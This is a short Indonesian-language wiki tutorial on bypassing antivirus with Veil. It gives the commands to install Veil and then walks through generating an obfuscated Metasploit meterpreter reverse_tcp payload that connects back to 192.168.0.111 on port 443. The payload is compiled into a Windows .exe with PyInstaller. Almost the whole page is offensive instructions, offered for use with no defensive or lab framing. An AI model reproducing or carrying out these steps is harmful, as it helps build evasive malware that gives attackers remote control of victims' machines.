ByPass Antivirus Dengan Veil

From SpeedyWiki

Jump to: navigation, search

Contents

[edit] ByPass Antivirus Dengan Veil

[edit] Pendahuluan

Payload yang diinject dengan menggunakan Metasploit biasanya terdeteksi oleh antivirus. Kita bisa membypass antivirusnya dengan menyamarkan payloadnya dengan Veil.

[edit] Instalasi Veil

   wget https://github.com/ChrisTruncer/Veil/archive/master.zip
   unzip master.zip
   cd Veil-master/setup
   cd ..
   ./setup.sh

[edit] Penggunaan

Setelah instalasi, jalankan veilnya

./Veil

Ada 18 payload yang sudah siap digunakan. Untuk melihat daftar payloadnya kita gunakan perintah "use"

use

Sebagai contoh kita pilih payload python/b64VirtualAlloc dengan mengetik angka 18

18

Selanjutnya kita ketik perintah "generate" untuk menggenerate payloadnya

generate

Setelah itu kita pilih msfvenom dengan mengetik angka "1"

1

Lalu kita berikan detail payloadnya misal

Enter metasploit payload: “windows/meterpreter/reverse_tcp“
Enter value for ‘LHOST’, [tab] for local IP: “192.168.0.111"
Enter value for ‘LPORT’: “443“

Setelah payload digenerate kita beri nama payloadnya misalkan "bypass"

Kita akan gunakan Pyinstaller untuk membuat file .exe. Ketik "1"

Hasilnya payload akan disimpan di /root/Veil-master/output/compiled/

[edit] Pranala Menarik

Personal tools